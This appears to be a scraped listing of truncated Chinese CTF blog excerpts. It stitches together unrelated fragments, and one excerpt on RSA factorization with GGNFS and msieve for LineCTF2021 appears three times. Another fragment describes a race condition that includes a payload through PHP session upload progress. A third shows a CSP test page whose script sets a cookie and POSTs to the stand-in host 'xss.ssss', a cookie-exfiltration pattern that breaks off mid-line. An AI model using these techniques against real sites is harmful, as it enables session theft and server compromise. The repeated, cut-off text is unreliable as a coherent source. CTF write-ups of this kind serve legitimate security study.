之前做LineCTF2021-babycrypto3题时,知道明显是RSA的大整数分解,使用了各种方式,未果,事后了解到GGNFS和MSIEVE分解因数本文就各种可能状况的分解进行简单介绍,并详细介绍一些工具的安装使用,以及针对带有pub.pem的公钥文件的RSA题进行简单总结 RSA整数分解场景 假设我们从题目获得了公钥(N,e)和待解密的密文c,由RSA的加...
之前做LineCTF2021-babycrypto3题时,知道明显是RSA的大整数分解,使用了各种方式,未果,事后了解到GGNFS和MSIEVE分解因数本文就各种可能状况的分解进行简单介绍,并详细介绍一些工具的安装使用,以及针对带有pub.pem的公钥文件的RSA题进行简单总结 RSA整数分解场景 假设我们从题目获得了公钥(N,e)和待解密的密文c,由RSA的加...
如果POST一被读取,session的内容就会被清空,所以为了在清空之前能包含到有我们payload的session,还需要用条件竞争。 记得当时在@wupco在SCTF2018的题目的非预期解,https://www.cnblogs.com/iamstudy/articles/sctf2018_simple_php_web_writeup.html 我当时以为session.upload_progress.enabled=On仅仅是个意外,是@l3m0n...
phpheader("Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline';");?>csp header testdocument.cookie="csp="+escape("sad@jisajid&*JDSJddsajhdsajkh21sa213123o1")+";";varxml=newXMLHttpRequest();xml.open('POST','http://xss.ssss',true);xml.setRequestHeader("...
之前做LineCTF2021-babycrypto3题时,知道明显是RSA的大整数分解,使用了各种方式,未果,事后了解到GGNFS和MSIEVE分解因数本文就各种可能状况的分解进行简单介绍,并详细介绍一些工具的安装使用,以及针对带有pub.pem的公钥文件的RSA题进行简单总结 RSA整数分解场景 假设我们从题目获得了公钥(N,e)和待解密的密文c,由RSA的加...